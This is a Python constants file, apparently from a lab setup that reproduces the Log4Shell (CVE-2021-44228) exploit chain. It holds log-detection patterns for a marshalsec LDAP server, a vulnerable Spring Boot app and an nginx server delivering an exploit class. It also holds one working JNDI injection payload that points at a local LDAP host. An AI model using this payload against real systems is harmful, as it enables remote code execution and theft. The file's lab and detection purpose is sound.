-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathconstants.py
35 lines (25 loc) · 1.38 KB
/
constants.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import logging
DEBUG = "DEBUG"
INFO = "INFO"
WARNING = "WARNING"
ERROR = "ERROR"
MARSHAL_SEC_UP_PATTERN = "^.*Listening on 0.0.0.0:1389.*$"
MARSHAL_SEC_UP_MESSAGE = "Marshalsec is up and running"
SPRING_BOOT_UP_PATTERN = "^.*:: Spring Boot ::.*$"
SPRING_BOOT_UP_MESSAGE = "Vulnerable spring boot is up and running "
PAYLOAD_SENT_PATTERN = ".*Sending payload.*"
PAYLOAD_SENT_MESSAGE = "The payload was sent using curl"
HTTP_SERVER_UP_PATTERN = ".*1#1: nginx/.*"
HTTP_SERVER_UP_MESSAGE = "Nginx server is up and running"
MARSHAL_SEC_CALLED_FOR_44228_PATTERN = ".*Send LDAP reference result for Exploit44228 redirecting to.*"
MARSHAL_SEC_CALLED_FOR_44228_MESSAGE = "The LDAP call was made by the JNDI payload due to CVE-2021-44228 (Possible exfiltration)"
HTTP_CALLED_FOR_44228_PATTERN = ".*GET /Exploit44228.class HTTP/1.*"
HTTP_CALLED_FOR_44228_MESSAGE = "Exploit is being dowloaded from the Nginx server due to CVE-2021-44228"
DEFAULT_PAYLOAD = "${jndi:ldap://host.docker.internal:1389/Exploit44228}"
LOG_PATTERNS = [
[MARSHAL_SEC_UP_PATTERN, MARSHAL_SEC_UP_MESSAGE, logging.INFO],
[SPRING_BOOT_UP_PATTERN, SPRING_BOOT_UP_MESSAGE, logging.INFO],
[PAYLOAD_SENT_PATTERN, PAYLOAD_SENT_MESSAGE, logging.INFO],
[HTTP_CALLED_FOR_44228_PATTERN, HTTP_CALLED_FOR_44228_MESSAGE, logging.WARNING],
[MARSHAL_SEC_CALLED_FOR_44228_PATTERN, MARSHAL_SEC_CALLED_FOR_44228_MESSAGE, logging.WARNING],
]